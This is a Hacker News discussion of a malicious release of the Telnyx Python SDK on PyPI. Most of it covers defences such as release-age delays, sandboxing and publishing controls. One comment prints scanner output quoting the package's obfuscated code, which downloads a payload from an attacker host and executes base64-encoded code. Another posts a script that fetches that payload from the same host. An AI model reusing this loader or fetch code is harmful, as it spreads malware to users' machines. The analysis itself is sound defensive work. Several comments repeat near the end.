mil22 1 days ago [-]
For those using uv, you can at least partially protect yourself against such attacks by adding this to your pyproject.toml:
[tool.uv]
exclude-newer = "7 days"
or this to your ~/.config/uv/uv.toml:
exclude-newer = "7 days"
This will prevent uv picking up any package version released within the last 7 days, hopefully allowing enough time for the community to detect any malware and yank the package version before you install it.
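To make the mechanism concrete, here is a rough sketch of what such a cutoff does — the function and data shapes are mine for illustration, not uv's internals:

```python
from datetime import datetime, timedelta, timezone

def eligible_versions(releases, max_age=timedelta(days=7), now=None):
    """Drop any release uploaded within the last `max_age`, the way
    exclude-newer hides recent uploads from the resolver.
    `releases` maps version string -> upload datetime (UTC)."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - max_age
    return {v: t for v, t in releases.items() if t <= cutoff}
```

uv applies the equivalent filter per index request, using the upload timestamps the index reports.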
notatallshaw 24 hours ago [-]
Pip maintainer here. To do this in pip (26.0+), you currently have to manually calculate the date, e.g. --uploaded-prior-to="$(date -u -d '3 days ago' '+%Y-%m-%dT%H:%M:%SZ')"
In pip 26.1 (release scheduled for April 2026), it will support the day ISO 8601 duration format, which uv also supports, so you will be able to do --uploaded-prior-to=P3D, or set it via env vars or config files, as all pip options can be.
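For anyone without GNU date (macOS's BSD date has no `-d`), the same cutoff string can be computed in Python — a sketch producing the RFC 3339 shape used in the example above:

```python
from datetime import datetime, timedelta, timezone

def uploaded_prior_to(days):
    """Equivalent of `date -u -d 'N days ago' '+%Y-%m-%dT%H:%M:%SZ'`."""
    cutoff = datetime.now(timezone.utc) - timedelta(days=days)
    return cutoff.strftime("%Y-%m-%dT%H:%M:%SZ")

print(uploaded_prior_to(3))  # e.g. 2026-03-27T12:00:00Z
```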
VladVladikoff 20 hours ago [-]
Thanks!
lijok 20 hours ago [-]
[flagged]
jmward01 24 hours ago [-]
I am a slow adopter of uv. I'll be honest, its speed has never been a big deal to me and, in general, it is YAPT (yet another package tool), but this one feature may make me reconsider. Pinning versions is less than perfect but I would really like to be able to stay XXX days behind exactly for this reason.
I think the python community, and really all package managers, need to promote standard cache servers as first class citizens as a broader solution to supply chain issues. What I want is a server that presents pypi with safeguards I choose. For instance, add packages to the local index that are no less than xxx days old (this uv feature), but also freeze that unless an update is requested or required by a security concern, scan security blacklists to remove/block packages and versions that have been found to have issues. Update the cache to allow a specific version bump. That kind of thing. Basically, I have several projects and I just want to do a pip install but against my own curated pypi. I know this is the intent of virtual envs/lock files, etc, but coordinating across projects and having my own server to grab from when builds happen (guaranteeing builds won't fail) is import. At a minimum it would be good to have a 'curated.json' or something similar that I could point pip/other package managers to to enforce package policies across projects. These supply chain attacks show that all it takes is a single update and your are in big trouble so we, unfortunately, need more layers of defense.
zahlman 22 hours ago [-]
> I think the Python community, and really all package managers, need to promote standard cache servers as first-class citizens as a broader solution to supply chain issues. What I want is a server that presents PyPI with safeguards I choose. For instance: add packages to the local index that are no less than XXX days old (this uv feature), but also freeze that unless an update is requested or required by a security concern; scan security blacklists to remove/block packages and versions that have been found to have issues; update the cache to allow a specific version bump. That kind of thing.
If "my own curated pypi" extends as far as a whitelist of build artifacts, you can just make a local "wheelhouse" directory of those, and pass `--no-index` and `--find-links /path/to/wheelhouse` in your `pip install` commands (I'm sure uv has something analogous).
vrighter 16 hours ago [-]
If everyone waited a week, then everybody would still be installing it at the same time, for the first time. This is not a solution.
TheTaytay 15 hours ago [-]
A lot of automated scanners run during that week.
vovavili 7 hours ago [-]
Let security researchers, staff and automated malware scanners take a bite first.
ashishb 19 hours ago [-]
Rather than being hopeful, why not start running 'uv' inside a sandbox?
Why does your Python package (CLI/web server/library) need full access to your entire disk at execution time?
dist-epoch 18 hours ago [-]
You're doing all of your software development inside containers, all the time?
That is very inconvenient.
ghgr 4 hours ago [-]
I'd argue it's not only not inconvenient, but also a great way of keeping your system clean of all the random system-wide dependencies you'll end up accumulating over the years.
TheTaytay 15 hours ago [-]
Devcontainers are looking pretty gold right now…
LtWorf 11 hours ago [-]
Why? Just open your entire editor/whatever inside a limited namespace and that's it no?
cestivan 12 hours ago [-]
[dead]
janzer 18 hours ago [-]
EDIT: This was caused by using an old version of uv (0.7.3); updating with `uv self update` to the latest version (0.11.2) resolved it. Original message below:
While the first form seems to work with `pyproject.toml`, the second form in the global `uv.toml` only seems to accept actual dates and not relative times. Trying to put in a relative time (either in the form "7 days" or "P7D") results in a "failed to parse" error.
madushan1000 21 hours ago [-]
I really wish uv had some sandboxing built in.
woodruffw 21 hours ago [-]
Please open an issue on the uv tracker! This is a design space we’re actively thinking about, and it’s valuable to hear user perspectives on what they would and wouldn’t want a sandbox to do.
__mharrison__ 24 hours ago [-]
Love it! Let those pip users find the compromised packages for us uv users.
bombcar 23 hours ago [-]
Until everyone waits 7 days to install everything so the compromise is discovered on the 8th day.
End result will be everyone runs COBOL only.
gonzalohm 23 hours ago [-]
Or just scan all GitHub repos, find their .toml definition. Calculate the median and then add 7 days to that. That way you are always behind.
dist-epoch 18 hours ago [-]
I'm already ahead of you. I'm using `exclude-newer = "8 days"`
zar1048576 23 hours ago [-]
:-) That might not even be enough as I hear (but haven't verified) that Claude does a pretty good job of making sense out of legacy COBOL code!
TacticalCoder 20 hours ago [-]
But not all projects exploited in a supply chain attack get exploited on the same day.
So when project A gets pwned on day 1 and then, following the attack, project B gets pwned on day 3, if users wait 7 days to upgrade, that leaves two days for the maintainers of project B to fix the mess: everybody will have noticed by day 8 that package A was exploited, and that leaves time for project B (and the other projects depending on either A or B) to adapt and fix the mess.
As a side note, during the first 7 days it could also happen that the maintainers of project A notice the shenanigans.
anthk 22 hours ago [-]
Or Forth with a scientific library, bound to the constraints. Put some HTTP library on top and an easy HTML interface for a browser with no JS/CSS3 support at all. It will look rusty but unexploitable.
Enterprise computing with custom software will make a comeback to avoid these pitfalls. I despise OpenJDK/Mono because of patents, but at least they come with complete defaults, and a 'normal' install is more than enough to ship a workable application for almost every OS. Ah, well, smartphones. Serious work is never done with those tools, even with high-end tablets. Maybe for salespeople, and that's it.
It's either that... or promoting reproducible environments with Guix everywhere. Your own Guix container, isolated, importing Pip/CPAN/CTAN/NPM/OPAM and who knows what else into a manifest file, and ready to ship anywhere: as a Guix package, a Docker container (Guix can do that), a single DEB/RPM, an AppImage ready to launch on any modern GNU/Linux with a desktop, and a lot more.
dotancohen 17 hours ago [-]
> Or Forth with a scientific library, bound to the constraints. Put some HTTP library on top and an easy HTML interface for a browser with no JS/CSS3 support at all. It will look rusty but unexploitable.
Let this be a lesson to you youngsters that nothing is unexploitable.
Forth has no standard library for interfacing with SQLite or any other database. You're either using 8th or the C ABI. Therefore, you'll most likely be concatenating SQL queries. Are you disciplined enough to make that properly secure? Do you know all the intricacies?
anthk 3 hours ago [-]
GForth might have them, for sure (SQLite is small and supported even by jimtcl). Also, there's Factor, a Forth-inspired language.
mulmen 19 hours ago [-]
Does this also delay delivery of security fixes? Is there an override mechanism for a log4j type event?
dist-epoch 18 hours ago [-]
It delays everything. You can manually override some packages, but the community can't push through it.
mulmen 10 hours ago [-]
RPM (YUM? DNF? RHEL?) lets me subscribe to security updates separately from updates. Does that concept exist in language distribution?
8n4vidtmkvmk 2 hours ago [-]
I don't know how it would. Hackers would just claim everything is a security update.
Unless maybe you give special permission to some trusted company to designate certain releases of packages they don't own are security patches... But that sounds untenable.
what 20 hours ago [-]
Is “7 days” valid? The docs suggest it has to be an ISO 8601 period or an RFC 3339 timestamp.
"Accepts RFC 3339 timestamps (e.g., 2006-12-02T02:07:43Z), a \"friendly\" duration (e.g., 24 hours, 1 week, 30 days), or an ISO 8601 duration (e.g., PT24H, P7D, P30D)."
TZubiri 1 days ago [-]
Nice feature. However uv is suspect at the moment, in the sense that it is designed as a pip replacement to overcome issues that only exist when supply chains are of a size that isn't safe to have.
So any project that uses uv, and any developer who tries to get uv into a project, is on average less safe than a project that just uses pip and a requirements.txt.
sdoering 1 days ago [-]
Sorry - call me uninformed. But I do not really understand how choosing uv makes me less safe than using pip.
Care to explain? Would love to learn.
jcass8695 1 days ago [-]
It is a bit of a leap. They are saying that if you are using uv, then you likely have a broad set of dependencies because you require a dependency management tool, therefore you are more susceptible to a supply chain attack by virtue of having a wider attack surface.
sdoering 21 hours ago [-]
Ahhhhhh thanks a ton. Now I get it. Meaning I get what you are saying. Not what they were implying. But yeah. I can understand at least how one could arrive at that idea.
To me personally this idea still sounds a bit off - but as a heuristic it might have some merit in certain circumstances.
Imustaskforhelp 1 days ago [-]
I really am not able to follow this line of reasoning; I am not sure what you said makes sense, or how uv having a security feature makes it on average less safe :/
thewebguyd 24 hours ago [-]
I believe they are saying that by the time you need something like uv, your project already has too many dependencies. It's the unnecessarily large supply chain that's the problem, and uv exists to solve a problem that you should try to avoid in the first place.
I think uv is great, but I somewhat agree. We see this issue with node/npm. We need smaller supply chains/less dependencies overall, not just bandaiding over the poor decisions with better dependency management tooling.
catgary 23 hours ago [-]
This line of thought is honestly a bit silly - uv is just a package manager that actually does its job for resolving dependencies. You’re talking about a completely orthogonal problem.
zahlman 22 hours ago [-]
> uv is just a package manager that actually does its job for resolving dependencies.
Pip resolves dependencies just fine. It just also lets you try to build the environment incrementally (which is actually useful, especially for people who aren't "developers" on a "project"), and is slow (for a lot of reasons).
duskdozer 8 hours ago [-]
uv is really only something you need if you already aren't managing dependencies responsibly, imo.
Imustaskforhelp 23 hours ago [-]
Ah this simplifies what they were saying.
I agree that dependency management should be made easier. To be honest, I really like how golang's dependency management works and how golang's community works around dependencies: golang has a really great stdlib to work with, and the community likes to rely on very few dependencies for the most part as well.
Maybe second to that, Zig is interesting as although I see people using libraries, its on a much lower level compared to rust/node/python.
Sadly, rust suffers from the same dependency issue like node/python.
joshred 1 days ago [-]
This is complete nonsense. pip has all the same problems that you say uv has.
cozzyd 19 hours ago [-]
The (not very convincing, IMO) argument is that pip becomes unergonomic past a certain dependency tree size, leading people to use uv instead. Of course, that's not the only or main reason people use uv, presumably.
paulddraper 1 days ago [-]
Huh?
Wanting a better pip means I am unsafe?
f311a 1 days ago [-]
They did not even try to hide the payload that much.
Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.
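A minimal illustration of that kind of grep-style check — these patterns are mine and far simpler than what real scanners ship:

```python
import re

# Illustrative patterns only; real rule sets are much larger.
SUSPICIOUS = [
    re.compile(r"exec\s*\(\s*base64\.b64decode"),
    re.compile(r"eval\s*\(\s*base64\.b64decode"),
]

def flag_lines(source):
    """Return (line number, stripped line) for each suspicious line."""
    return [(i, line.strip())
            for i, line in enumerate(source.splitlines(), 1)
            if any(p.search(line) for p in SUSPICIOUS)]
```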
hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000
warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
86:13
│
7783 │ except:
7784 │ pass
7785 │
7786 │ r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
7787 │ with urllib.request.urlopen(r, timeout=15) as d:
7788 │ with open(t, "wb") as f:
7789 │ f.write(d.read())
│
= Confidence: High
Help: Data exfiltration is the unauthorized transfer of data from a computer.
warning[HX4010]: Execution of obfuscated code.
┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
10:9
│
7807 │ if os.name == 'nt':
7808 │ return
7809 │ try:
7810 │ ╭ subprocess.Popen(
7811 │ │ [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
7812 │ │ stdout=subprocess.DEVNULL,
7813 │ │ stderr=subprocess.DEVNULL,
7814 │ │ start_new_session=True
7815 │ │ )
│ ╰─────────^ HX4010
7816 │ except:
7817 │ pass
7818 │
│
= Confidence: VeryHigh
Help: Obfuscated code exec can be used to bypass detection.
m000 1 days ago [-]
Are there more tools like hexora?
f311a 1 days ago [-]
GuardDog, but it's based on regexes
jbrowning 1 days ago [-]
> The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file.
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
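A sketch of the decoding scheme as the write-up describes it — everything beyond the base64-plus-8-byte-XOR structure (container parameters, key placement within a frame) is my assumption:

```python
import base64
import io
import wave

def extract_payload(wav_bytes):
    """Frame data -> base64-decode -> first 8 bytes are the XOR key,
    the rest is the XOR-ed payload."""
    with wave.open(io.BytesIO(wav_bytes)) as w:
        frames = w.readframes(w.getnframes())
    raw = base64.b64decode(frames)
    key, body = raw[:8], raw[8:]
    return bytes(b ^ key[i % 8] for i, b in enumerate(body))
```

The point of the trick is that the carrier remains a structurally valid WAV, so MIME sniffing and naive content checks pass.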
consp 23 hours ago [-]
I've seen it at least once in code from a big car manufacturer, who encrypted their software (or parts of it) to avoid you reading the XML files. They use a key split into two or more parts, hidden as the first bytes of some file or as plain text somewhere it would not look out of place, then recombine it and run it through a deobfuscation function to produce an old-fashioned DES or XOR key to decrypt the (usually XML; it could have been a different format, it's been a while) files. It's not that uncommon. It's also security theater. The funny part is they didn't obfuscate the code that reads the key.
dist-epoch 18 hours ago [-]
With homomorphic encryption you can do this now in a secure way - unbreakable client side obfuscation.
ac29 22 hours ago [-]
I was really hoping the audio file was going to be AFSK or someting
zahlman 21 hours ago [-]
> If the version shown is 4.87.1 or 4.87.2, treat the environment as compromised.
More generally speaking one would have to treat the computer/container/VM as compromised. User-level malware still sucks. We've seen just the other day that Python code can run at startup time with .pth files (and probably many other ways). With a source distribution, it can run at install time, too (see e.g. https://zahlman.github.io/posts/python-packaging-3/).
> What to Do If Affected
> Downgrade immediately:
> pip install telnyx==4.87.0
Even if only the "environment" were compromised, that includes pip in the standard workflow. You can use an external copy of pip instead, via the `--python` option (and also avoid duplicating pip in each venv, wasting 10-15MB each time, by passing `--without-pip` at creation). I touch on both of these in https://zahlman.github.io/posts/python-packaging-2/ (specifically, showing how to do it with Pipx's vendored copy of pip). Note that `--python` is a hack that re-launches pip using the target environment; pip won't try to import things from that environment, but you'd still be exposed to .pth file risks.
dist-epoch 18 hours ago [-]
Nice thing about VMs is that it's easy to have a daily snapshot, and roll it back to before compromise event.
ramimac 1 days ago [-]
We haven't blogged this yet, but a variety of teams found this in parallel.
I'm glad there's many teams with automated scans of pypi and npm running. It elevates the challenge of making a backdoor that can survive for any length of time.
Imustaskforhelp 1 days ago [-]
Ramimac, has there been any action on having the c2 server's ip address being blacklisted?
The blast radius of TeamPCP just keeps on increasing...
6thbit 23 hours ago [-]
So both this and litellm went straight to PyPI without going to GitHub first.
Is there any way to set up PyPI to only publish packages that come from a certain pattern of tag that exists in GH? Would such a measure help at all here?
woodruffw 21 hours ago [-]
Yes: if you use a Trusted Publisher with PyPI, you can constrain it to an environment. Then, on GitHub, you can configure that environment with a tag or branch protection rule that only allows the environment to be activated if the ref matches. You can also configure required approvers on the environment, to prevent anyone except your account (and potentially other maintainers you’d like) from activating the environment.
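As an illustrative sketch of the GitHub side (the environment name, tag pattern, and build commands are placeholders; the upload step is the PyPA-maintained publish action):

```yaml
# .github/workflows/release.yml — illustrative only
name: release
on:
  push:
    tags: ["v*"]
jobs:
  publish:
    runs-on: ubuntu-latest
    # "pypi" is a protected environment: a deployment tag rule limits
    # which refs can activate it, and required reviewers must approve.
    environment: pypi
    permissions:
      id-token: write  # mint the OIDC token for Trusted Publishing
    steps:
      - uses: actions/checkout@v4
      - run: python -m pip install build && python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
```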
LtWorf 11 hours ago [-]
If they have compromised the token wouldn't that mean the developer is compromised and such access can be used to just put "curl whatever" into the build and publish that payload on pypi?
woodruffw 7 hours ago [-]
I don’t understand the question, sorry.
LtWorf 5 hours ago [-]
I'll try to reformulate in a simpler way.
On debian, all builds happen without internet access. So whatever ends up on the .deb file is either contained on the dependencies or in the orig tarball.
Is anything similar done for builds that create artifacts for pypi, so that a certain correspondence between binary file and sources exists? Or is there unrestricted internet access so that what actually ends up on pypi can come from anywhere and vetting the sources is of little help?
woodruffw 4 hours ago [-]
That’s a nice property of centralized package management systems; I don’t think anything exactly like that exists for PyPI. The closest thing would be a cryptographic attestation.
(If I wanted to taxonomize these things, I say that the Debian model is effectively a pinky promise that the source artifacts correspond to the built product, except that it’s a better pinky promise because it’s one-to-many instead of many-to-many like language package managers generally are. You can then formalize that pinky promise with keys and signatures, but at the end of the day you’re still essentially binding a promise.)
functional_dev 2 hours ago [-]
Wasn't PEP 740 an attempt to solve this?
aniceperson 22 hours ago [-]
Don't keep the token on hand. Use OICD ideally, or make sure to set it up carefully as a repository secret. Ensure the workflow runs in a read-only, minimally permissioned, minimal-dependency environment.
The issue with OICD is that it does not work with nested workflows, because GitHub does not propagate the claims.
sh-cho 9 hours ago [-]
*OIDC
_ache_ 20 hours ago [-]
How can we get the wav ? `curl -A "Mozilla/5.0" "http://<C2C_EndPoint>/hangup.wav"` does hang.
No ... I tried hard.
But still get a timeout.
import urllib.request
import base64

def _d(x):
    return base64.b64decode(x).decode("utf-8")

C2C_URL = _d("aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg==")
# C2C_URL = "http://XXXXX:8080/ringtone.wav"

r = urllib.request.Request(
    C2C_URL, headers={_d("VXNlci1BZ2VudA=="): _d("TW96aWxsYS81LjA=")}
)
with urllib.request.urlopen(r, timeout=15) as d:
    with open("/tmp/extracted_tpcp.wav", "wb") as f:
        f.write(d.read())
viscousviolin 1 days ago [-]
Is there a notification channel you can subscribe to / look at if you want to stay up to date on compromised PyPI packages?
> The Telnyx platform, APIs, and infrastructure were not compromised. This incident was limited to the PyPI distribution channel for the Python SDK.
Am I being too nitpicky to say that that is part of your infrastructure?
Doesn't 2FA stop this attack in its tracks? PyPI supports 2FA, no?
cpburns2009 19 hours ago [-]
PyPI only supports 2FA for sign-in. 2FA is not a factor at all with publishing. To top it off, the PyPA's recommended solution, the half-assed trusted publishing, does nothing to prevent publishing compromised repos either.
rtpg 20 hours ago [-]
Yeah at this point I’d really like for pypi to insist on 2FA and email workflows for approving a release.
Yeah it means you don’t get zero click releases. Maybe boto gets special treatment
LtWorf 10 hours ago [-]
No. I was one of the "lucky" ones forced to use 2FA from the beginning.
I also wrote the twine manpage (in debian) because at the time there was even no way of knowing how to publish at all.
Basically you enable 2FA on your account, go on the website, generate a token, store it in a .txt file and use that for the rest of your life without having to use 2FA ever again.
I had originally thought you'd need your 2FA every upload but that's not how it works.
Then they have the trusted publisher thing (which doesn't and won't work with codeberg), where they just upload whatever comes from github's runners. Of course, if the developer's token.txt got compromised, there's a chance his private ssh key to push to github got compromised too, and the attackers can push something that will end up on pypi anyway.
Remember that trusted publishing replaces GPG signatures, so the one thing that required unlocking the private key with a passphrase is no longer used.
python.org has also stopped signing their releases with GPG in favour to sigstore, which is another 3rd party signing scheme somewhat similar to trusted publisher.
edit: They deny this but my suspicion is that eventually tokens won't be supported and trusted publishing will be the only way to publish on pypi, locking projects out of using codeberg and whatever other non-major forge they might wish to use.
cpburns2009 8 hours ago [-]
A stolen PyPI token was used for the compromised litellm package. I wouldn't be surprised if tokens are decommissioned in the aftermath of these recent hijackings. That wouldn't prevent these attacks: as you mentioned, SSH keys were stolen (and a GitHub token in the case of litellm). It would be a way for the PyPA to brush off liability without securing anything.
woodruffw 7 hours ago [-]
I’ll bypass the technical inaccuracies in this comment to focus on the main important thing.
> Then they have the trusted publisher thing (which doesn't and won't work with codeberg) where they just upload whatever comes from github's runners.
There’s no particular reason it wouldn’t work; it’s just OIDC and Codeberg could easily stand up an IdP. If you’re willing to put the effort into making this happen, I’d be happy (as I’ve said before) to review any contributions towards this end.
(The only thing that won’t work here is imputing malicious intent; that makes it seem like you have a score to settle rather than a genuine technical interest in the community.)
Has anyone here used Telnyx? I tried to build a product against their API last year and 3 weeks after signing up they banned my account and made it impossible to get an answer as to why or re-enable it.
AnssiH 10 hours ago [-]
I tried, but they used some 3rd party KYC platform whose country selection dropdown seemed to have every country except Finland (even Åland, a region of Finland, was there).
Support wasn't helpful.
Went with Twilio instead.
Meetvelde 19 hours ago [-]
I've had a pretty good experience using it to send SMS. Any chance you didn't get a 10DLC or toll free verification and tried to send too many messages?
sunshine-o 6 hours ago [-]
I believe Telnyx and Twilio nuked every small or personal accounts at some point because they couldn't risk those being used for spam or scams.
There might have been some real risks for them, IDK.
But it is ironic that Telnyx now brands itself as an AI company, yet they couldn't detect that I am just calling some family once in a while and not involved in a massive spam campaign.
The only one who kept me around was voip.ms but it literally doesn't work.
I am still looking for a decent VoIP provider to simply make calls.
TZubiri 1 days ago [-]
I like it so far. Did you call phone support at the time and ask about it? I find it's easy enough to get in a call with a human.
ivanvanderbyl 24 hours ago [-]
I did, they asked me to open a support ticket, which I did, and the last response I got was:
> We've reviewed the details you provided and updated your case with the necessary information. It is now being routed to the appropriate team for further support.
That was July 2025!
raphinou 10 hours ago [-]
I'm working on a multi signature system for file authentication that can detect unauthorized file publications. It is self-funded, open source, auditable, self hostable, accountless. I'm looking for testers and feedback, don't hesitate to contact me if interested.
More info at https://asfaload.com/
ilaksh 1 days ago [-]
The way I use Telnyx is via SIP, which is an open protocol. No reason we should be relying on proprietary APIs for this stuff.
On GitHub, see my fork runvnc/PySIP. Please let me know if you know of something better for Python that is not copyleft and doesn't rely on some copyleft or big external dependency. I was using baresip, but it was a pain to integrate and configure with Python.
Anyway, after fixing a lot in the original PySIP, my version works with Telnyx. Not tested on other SIP providers.
jlundberg 1 days ago [-]
We have always been API first rather than SDK first.
Never really thought too much about the security implications but that is of course a benefit too.
The main reasoning for us has been to aim for a really nice HTTP API rather than hide ugliness with an SDK on top.
1 days ago [-]
infinitewars 1 days ago [-]
Is this happening in part due to the sheer volume of pull-requests with AI generated code.. things are slipping through?
dgellow 6 hours ago [-]
The telnyx SDKs aren’t AI generated code. The issue here was a pypi account compromise
cozzyd 19 hours ago [-]
Wonder if publishing keys were compromised in one of the previous PyPI incidents...
slowmovintarget 1 days ago [-]
Telnyx provides voice capabilities for OpenClaw for those wondering.
indigodaddy 1 days ago [-]
They should add voip.ms. it's better all around I think
_JamesA_ 23 hours ago [-]
Voip.ms is great for a simple SIP trunk but it has almost none of the programmable voice and other features of Telnyx or Twilio.
RulerOf 21 hours ago [-]
A number of years ago I wanted to drop a webhook when a call came in on VoIP.ms but couldn't find any way to do it natively.
Ended up sticking a twilio endpoint in the ring group with a "press 1 to accept this call" message so it wouldn't eat the call, then was able to fire an http request with the call details.
It worked well, although I admit I was a little annoyed I couldn't do it directly with VoIP.ms.
indigodaddy 22 hours ago [-]
ah yeah, I'm about to set up a grandstream ht801 for a voip home phone, so I probably don't need all that
sunshine-o 6 hours ago [-]
I had a horrible experience with VoIP.ms.
Every time I wanted to call a number in Europe, I had to contact their support and go through "can you try now and see if it works?" several times.
After 3 months I had enough of it and asked to have my provisioned credit reimbursed but they just refused.
indigodaddy 1 days ago [-]
Hah, need to setup a Grandstream HT801 this weekend and this cements my decision to use voip.ms vs telnyx. Not that the device would use that library (have no idea), but just, yeah generally, it's a good cue to stay away for me.
kelvinjps10 23 hours ago [-]
I received an email from them about the vulnerability but I don't remember ever using them
charcircuit 1 days ago [-]
2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free rein to publish malicious packages at any time they want.
woodruffw 1 days ago [-]
In a lot of cases, it's not really clear whose second factor would authorize publishing a package that was uploaded from a CI/CD system. Is it any project owner? Anyone from the same GitHub organization? etc.
> An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
Agreed, that's why a lot of packaging ecosystems (including PyPI) have moved towards schemes that involve self-scoping, self-expiring tokens. The CI can still publish, but the attacker can no longer exfiltrate the publishing credential and use it indefinitely later.
(These schemes are not mandatory, because they can't be.)
charcircuit 24 hours ago [-]
The 2FA of whatever account is publishing the package. I'm pretty sure PyPI already has this figured out, except they seem to allow you to make an API key which just bypasses checking a second factor.
woodruffw 23 hours ago [-]
Which account is publishing the package, in a CI/CD context? It's not clear that any particular account is, since the set of people who can trigger a workflow in CI/CD aren't necessarily (and in fact aren't often) the same set of people who can create an API token on PyPI.
charcircuit 20 hours ago [-]
The user that owns the API key, or however it already associates an account with the publish. It isn't a new problem.
sigseg1v 1 days ago [-]
but then how can we deploy our vibe coded PRs we didn't review at a pace of 40 deploys per day?
paulddraper 24 hours ago [-]
Sounds like 2FA should be required for CI.
spocchio 24 hours ago [-]
Is there anyone who uses it? I see their repo's Initial Commit was on Jan 2026... quite a new package! Also, the number of GitHub stars and forks is quite low.
Does the package have a user base, or did the malicious team target one of the many useless GitHub repos?
KomoD 23 hours ago [-]
> I see their repo's Initial Commit was on Jan 2026... quite a new package!
That's incorrect, the repo and package date back to 2019
dlcarrier 1 days ago [-]
At this point, I'm not updating anything using Python.
Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward compatibility and version control when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.
I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.
It's not even the language itself (not that it doesn't have its own issues), or the inefficient way it's executed; it's that the ecosystem around it is made of so much technical debt.
It sounds to me like they are: `You know they've given up on backward compatibility and version control when the solution is: run everything in a VM, with its own installation.`
uv taking over basically ensures that dependencies won't become managed properly and nothing will work without uv
TZubiri 1 days ago [-]
Agree. I was working on an open source package, noticed something weird, then saw the size of the uv.lock and got a bit scared.
It's a pandemic, I will be hardening my security, and rotating my keys just in case.
hrmtst93837 8 hours ago [-]
Math and science picked Python because NumPy, SciPy, and pandas gave them a decent glue layer over C and Fortran, and once the papers, notebooks, and teaching material piled up, the lock-in was social as much as technical. MATLAB being awful helped, but only at the margin.
venv and Docker don't fix much. They just freeze the mess until rebuild day, when you find out half the stack depended on an old wheel, a dead maintainer, or a C extension that no longer compiles on a current Python.
paulddraper 24 hours ago [-]
Python is genuinely a pleasant syntax and experience. [1]
It's the closest language to pseudocode that exists.
Like every other language from 1991, it has rough edges.
I think it's only a matter of time at this point before a devastating supply chain attack occurs.
Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
dgellow 6 hours ago [-]
Not sure what you mean by devastating, but supply chain attacks occur pretty much daily worldwide, and LLMs have been used by attackers for multiple years at this point. Defending against supply chain threats is a pretty hard area to iterate in, and things are slow to change. For example, PyPI has only supported trusted publishers since 2023 IIRC, and lots of large companies are still not consistently using that option.
anthk 22 hours ago [-]
The Guix PM in this context can create an isolated environment and import PyPI packages for you, adapted into Guix Scheme manifest files. Not just Python: Perl, Ruby, Node... If you have to use dangerous or proprietary environments for the enterprise (not for personal computing), at least isolate them so the malware doesn't spread.
rvz 1 days ago [-]
That's not good. Time to raise the package security draw bridge on vibe coders.
doug_durham 1 days ago [-]
In what world do professional hackers intersect with vibe coding? This is a professional attack, not some amateur script-kiddie action.
TZubiri 1 days ago [-]
Shoutouts to all the real engineers who use a generic http client to call APIs and weren't impacted by this.
LoganDark 1 days ago [-]
I used to use Telnyx many years ago, but was squeezed out when they started adding layer after layer of mandatory identity verification. Nope.
carlsborg 1 days ago [-]
Anthropic/OpenAI could own this space. They should offer a paid mirror service with packages LLM-scanned and sandbox-evaluated by their next-gen models. Free for individuals; orgs can subscribe to it.
oblvious-earth 1 days ago [-]
OpenAI just acquired Astral who have an index service called pyx, so they would have a step up.
My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.
doc_ick 1 days ago [-]
There’s also virustotal, any.run, probably a few others outside of GitHub/gitlab scans
dmitrygr 21 hours ago [-]
Detecting properly-written malicious code is undecidable. No amount of snake oil fixes that
johndough 1 days ago [-]
Judging by curl shutting down its bug bounty program due to AI slop, a likely outcome would be that this mirror has no packages because they are all blocked by false positives.
FWIW, https://pypi.org/project/bandersnatch/ is the standard tool for setting up a PyPI mirror, and https://github.com/pypi/warehouse is the codebase for PyPI itself (including the actual website, account management etc.).
If "my own curated pypi" extends as far as a whitelist of build artifacts, you can just make a local "wheelhouse" directory of those, and pass `--no-index` and `--find-links /path/to/wheelhouse` in your `pip install` commands (I'm sure uv has something analogous).
Why does your python package (cli/Web server/library) need full access to your full disk at the time of execution?
That is very inconvenient.
While the first form seems to work with `pyproject.toml`, it seems like the second form in the global `uv.toml` only accepts actual dates and not relative times. Trying to put a relative time (either in the form "7 days" or "P7D") results in a failed to parse error.
End result will be everyone runs COBOL only.
So when project A gets pwned on day 1 and then, following the attack, project B gets pwned on day 3, if users wait 7 days to upgrade, that leaves two days for the maintainers of project B to fix the mess: everybody will have noticed by the 8th day that package A was exploited, and that leaves time for project B (and the other projects depending on either A or B) to adapt and fix the mess.
As a side note, during the first 7 days it could also happen that the maintainers of project A notice the shenanigans.
Enterprise computing with custom software will make a comeback to avoid these pitfalls. I despise OpenJDK/Mono because of patents, but at least they come with complete defaults, and a 'normal' install is more than enough to ship a workable application for almost every OS. Ah, well, smartphones. Serious work is never done with those, even with high-end tablets. Maybe for salespeople, and that's it.
